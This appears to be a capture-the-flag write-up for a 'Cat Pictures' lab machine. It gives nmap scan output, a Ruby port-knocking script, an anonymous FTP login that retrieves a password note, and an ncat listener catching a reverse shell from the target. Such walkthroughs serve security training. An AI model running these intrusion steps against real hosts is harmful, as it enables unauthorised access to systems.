# Nmap 7.91 scan initiated Mon Jul 26 11:24:16 2021 as: nmap -sSVC -p- -oA nmap_full -v -T 4 10.10.39.43 Nmap scan report for 10.10.39.43 Host is up (0.031s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 21/tcp filtered ftp 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA) | 256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA) |_ 256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (ED25519) 2375/tcp filtered docker 4420/tcp open nvm-express? | fingerprint-strings: | DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, RTSPRequest: | INTERNAL SHELL SERVICE | please note: cd commands do not work at the moment, the developers are fixing it at the moment. | ctrl-c | Please enter password: | Invalid password... | Connection Closed | NULL, RPCCheck: | INTERNAL SHELL SERVICE | please note: cd commands do not work at the moment, the developers are fixing it at the moment. | ctrl-c |_ Please enter password: 8080/tcp open http Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION |_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27 |_http-title: Cat Pictures - Index page
We found an unusual service on port 4420, let's try to connect to it.
1 2 3 4 5 6 7 8 9 10 11 12
$ telnet catpictures.thm 4420 Trying 10.10.39.43... Connected to 10.10.39.43. Escape character is '^]'. INTERNAL SHELL SERVICE please note: cd commands do not work at the moment, the developers are fixing it at the moment. do not use ctrl-c Please enter password: password Invalid password... Connection Closed Connection closed by foreign host.
Right now we don't have credentials so let's try the web service instead.
We can look at Rubyfu
to find how to write a simple Port knocking script in ruby.
1 2 3 4 5 6 7 8 9 10 11 12 13 14
require'socket'
ports = [1111, 2222, 3333, 4444]
ports.each do |port| puts "[+] Port: #{port}" sleep 1 begin s = TCPSocket.new '10.10.39.43', port s.close rescueErrno::ECONNREFUSED, Errno::EHOSTUNREACH next end end
Now if scan ports again, we'll see the FTP port is open:
1 2 3 4 5 6 7
$ sudo nmap -sS 10.10.39.43 -p- -v -T 4 PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 2375/tcp filtered docker 4420/tcp open nvm-express 8080/tcp open http-proxy
$ ftp catpictures.thm Connected to catpictures.thm. 220 (vsFTPd 3.0.3) Name (catpictures.thm:noraj): anonymous 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 ftp ftp 162 Apr 02 14:32 note.txt 226 Directory send OK. ftp> get note.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for note.txt (162 bytes). 226 Transfer complete. 162 bytes received in 3,2e-05 seconds (4,83 Mbytes/s) ftp> quit 221 Goodbye.
$ cat note.txt In case I forget my password, I'm leaving a pointer to the internal shell service on the server.
Connect to port 4420, the password is s<edited>t. - catlover
$ ncat -lvnp 9001 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::9001 Ncat: Listening on 0.0.0.0:9001 Ncat: Connection from 10.10.39.43. Ncat: Connection from 10.10.39.43:38828. bash: cannot set terminal process group (1609): Inappropriate ioctl for device bash: no job control in this shell I have no name!@cat-pictures:/# echo $SHELL echo $SHELL /bin/sh I have no name!@cat-pictures:/# echo $TERM echo $TERM dumb